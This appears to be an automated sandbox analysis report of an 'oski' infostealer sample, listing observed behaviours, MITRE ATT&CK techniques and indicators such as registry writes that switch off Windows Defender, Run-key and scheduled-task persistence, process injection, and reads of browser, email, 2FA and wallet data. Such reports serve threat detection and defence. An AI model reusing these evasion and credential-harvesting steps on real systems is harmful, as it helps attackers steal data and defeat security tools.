oski | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

System Information Discovery

Processes:

Lulevugodu.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Lulevugodu.exe

Drops startup file 1 IoCs

Processes:

Mutato.exe.com

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sAeNYVsWrM.url Mutato.exe.com

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sAeNYVsWrM.url	Mutato.exe.com

Loads dropped DLL 64 IoCs

Processes:

Install.tmpinstaller.exesvchost.exeMsiExec.exerundll32.exeMsiExec.exeSunLabsPlayer.exepowershell.exetoolspab1.exeMsiExec.exey1.exepowershell.exe3529.exe5229.exe

pid	process
2800	Install.tmp
4644	installer.exe
4644	installer.exe
5048	svchost.exe
4644	installer.exe
5048	svchost.exe
5048	svchost.exe
5012	MsiExec.exe
5012	MsiExec.exe
2432	rundll32.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
5768	SunLabsPlayer.exe
4556	MsiExec.exe
4644	powershell.exe
5072	toolspab1.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
5768	SunLabsPlayer.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
4556	MsiExec.exe
5492	y1.exe
5492	y1.exe
5492	y1.exe
5492	y1.exe
5492	y1.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
4452	powershell.exe
4452	powershell.exe
4956	3529.exe
5184	5229.exe
5184	5229.exe
5184	5229.exe
5184	5229.exe
5184	5229.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

0GT3idJpQE.exesqlcmd.exerundll32.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	0GT3idJpQE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe = "0"	sqlcmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe = "0"	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	0GT3idJpQE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe = "0"	0GT3idJpQE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NXfSHgjpzLhX = "0"	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	0GT3idJpQE.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Ultra.exegpooe.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Faeshaweligo.exe\""	Ultra.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gpooe.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery
T1063

Processes:

powershell.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

jg8_mysu.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg8_mysu.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg8_mysu.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

installer.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

249 api.myip.com
250 api.myip.com
298 myexternalip.com
299 myexternalip.com
66 ip-api.com

flow	ioc
249	api.myip.com
250	api.myip.com
298	myexternalip.com
299	myexternalip.com
66	ip-api.com

Drops file in System32 directory 22 IoCs

Processes:

svchost.exerundll32.exerundll32.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\PjPVhJpbFf	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent D23CD004EE1349B3	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\2IG10C9M.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\2IG10C9M.cookie	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Azure-Update-Task	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\NXfSHgjpzLhX	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs

Processes:

2C9C.exe5229.exe

pid	process
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe

Suspicious use of SetThreadContext 24 IoCs

Processes:

Conhost.exesvchost.execmd.exe2C9C.exe3140.exe5229.exe0GT3idJpQE.exeFessura.exe.comMutato.exe.comsqlcmd.exejwtwjbtsqlcmd.exesqlcmd.exesqlcmd.exesqlcmd.exesqlcmd.exejwtwjbtsqlcmd.exesqlcmd.exesqlcmd.exesqlcmd.exesqlcmd.exejwtwjbtsqlcmd.exe

description	pid	process	target process
PID 4600 set thread context of 5048	4600	Conhost.exe	svchost.exe
PID 4076 set thread context of 4588	4076	svchost.exe	svchost.exe
PID 5852 set thread context of 5072	5852	cmd.exe	toolspab1.exe
PID 3788 set thread context of 4452	3788	2C9C.exe	powershell.exe
PID 4712 set thread context of 5372	4712	3140.exe	3140.exe
PID 4948 set thread context of 5184	4948	5229.exe	5229.exe
PID 5240 set thread context of 8144	5240	0GT3idJpQE.exe	0GT3idJpQE.exe
PID 5300 set thread context of 6176	5300	Fessura.exe.com	RegAsm.exe
PID 5772 set thread context of 6516	5772	Mutato.exe.com	RegAsm.exe
PID 4628 set thread context of 7596	4628	sqlcmd.exe	sqlcmd.exe
PID 3464 set thread context of 6524	3464	jwtwjbt	jwtwjbt
PID 4564 set thread context of 6676	4564	sqlcmd.exe	sqlcmd.exe
PID 6496 set thread context of 7076	6496	sqlcmd.exe	sqlcmd.exe
PID 7992 set thread context of 3844	7992	sqlcmd.exe	sqlcmd.exe
PID 5356 set thread context of 660	5356	sqlcmd.exe	sqlcmd.exe
PID 5608 set thread context of 2124	5608	sqlcmd.exe	sqlcmd.exe
PID 3892 set thread context of 1576	3892	jwtwjbt	jwtwjbt
PID 5876 set thread context of 816	5876	sqlcmd.exe	sqlcmd.exe
PID 2424 set thread context of 2716	2424	sqlcmd.exe	sqlcmd.exe
PID 7768 set thread context of 4312	7768	sqlcmd.exe	sqlcmd.exe
PID 5904 set thread context of 4348	5904	sqlcmd.exe	sqlcmd.exe
PID 7796 set thread context of 7912	7796	sqlcmd.exe	sqlcmd.exe
PID 4896 set thread context of 3800	4896	jwtwjbt	jwtwjbt
PID 3832 set thread context of 7108	3832	sqlcmd.exe	sqlcmd.exe

Drops file in Program Files directory 64 IoCs

Processes:

SunLabsPlayer.exemsiexec.exedata_load.exepowershell.exe

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\data_load.exe	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\cache.dat	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\NXfSHgjpzLhX\cache.dat	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 37 IoCs

Processes:

msiexec.exe0GT3idJpQE.exeMicrosoftEdge.exeMicrosoftEdge.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI4EB0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5336.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DE4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI371B.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe	0GT3idJpQE.exe
File created	C:\Windows\Installer\f74f821.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f74f821.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI35D2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFDDE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8AE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3574.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2E5D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI32E2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB13.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2BBC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI44BA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI551B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI99A.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4A87.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5057.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe	0GT3idJpQE.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI811.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI27E3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\f74f824.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5B86.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI6F7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAA4.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

5068 3788 WerFault.exe 2C9C.exe
4828 4948 WerFault.exe 5229.exe

pid	pid_target	process	target process
5068	3788	WerFault.exe	2C9C.exe
4828	4948	WerFault.exe	5229.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

jwtwjbtjwtwjbttoolspab1.exejwtwjbt

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

svchost.exepowershell.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
8160	schtasks.exe
64	schtasks.exe
7992	schtasks.exe
6888	schtasks.exe
4604	schtasks.exe
4340	schtasks.exe
2716	schtasks.exe
6464	schtasks.exe
7696	schtasks.exe
6012	schtasks.exe
7388	schtasks.exe
1540	schtasks.exe
7176	schtasks.exe
7656	schtasks.exe

Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4644 timeout.exe
4916 timeout.exe
4512 timeout.exe
4804 timeout.exe
6124 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

4616 bitsadmin.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4668 taskkill.exe
5976 taskkill.exe
4808 taskkill.exe
5580 taskkill.exe

pid	process
4644	timeout.exe
4916	timeout.exe
4512	timeout.exe
4804	timeout.exe
6124	timeout.exe

pid	process
4616	bitsadmin.exe

pid	process
4668	taskkill.exe
5976	taskkill.exe
4808	taskkill.exe
5580	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

